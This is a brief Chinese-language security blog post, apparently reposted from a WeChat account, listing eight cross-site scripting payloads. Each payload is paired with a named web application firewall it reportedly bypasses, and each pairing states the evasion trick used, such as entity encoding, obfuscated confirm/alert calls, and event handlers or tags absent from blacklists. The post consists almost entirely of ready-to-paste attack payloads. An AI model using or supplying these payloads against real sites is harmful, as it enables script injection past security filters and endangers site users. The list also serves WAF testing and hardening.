8 个 WAF绕过
2022-7-27 00:2:48 Author: 橘猫学安全(查看原文) 阅读量:36 收藏

名称: Cloudflare
有效负载: <a"/onclick=(confirm)()>click
绕过技术:非空白填充

名称: Wordfence
负载: <a/href=javascript&colon;alert()>click
绕过技术:数字字符编码

名称:Barracuda
有效载荷: <a/href=&#74;ava%0a%0d%09script&colon;alert()>click
绕过技术:数字字符编码

名称: Akamai
负载: <d3v/onauxclick=[2].some(confirm)>click
绕过技术:黑名单中缺少事件处理程序和函数调用混淆

名称: Comodo
有效负载: <d3v/onauxclick=(((confirm)))``>click
绕过技术:黑名单中缺少事件处理程序和函数调用混淆

名称: F5
负载: <d3v/onmouseleave=[2].some(confirm)>click
绕过技术:黑名单中缺少事件处理程序和函数调用混淆

名称: ModSecurity
负载: <details/open/ontoggle=alert()>
绕过技术:黑名单中缺少标签(事件处理程序?)

名称: dotdefender
负载: <details/open/ontoggle=(confirm)()//
绕过技术:黑名单中缺少标签、函数调用混淆和备用标签结尾

如有侵权,请联系删除

推荐阅读

XSS 实战思路总结

内网信息收集总结

xss攻击、绕过最全总结

一些webshell免杀的技巧

命令执行写webshell总结

SQL手工注入总结 必须收藏

后台getshell常用技巧总结

web渗透之发现内网有大鱼

蚁剑特征性信息修改简单过WAF

查看更多精彩内容,还请关注橘猫学安全:

每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247495099&idx=2&sn=8a120a54199701dd18c6b20440522ff2&chksm=c04d6a85f73ae393f1fc646cdeff2d81a654245b3df7d96a50d5909e0917f32c238f3e4707ae#rd
如有侵权请联系:admin#unsafe.sh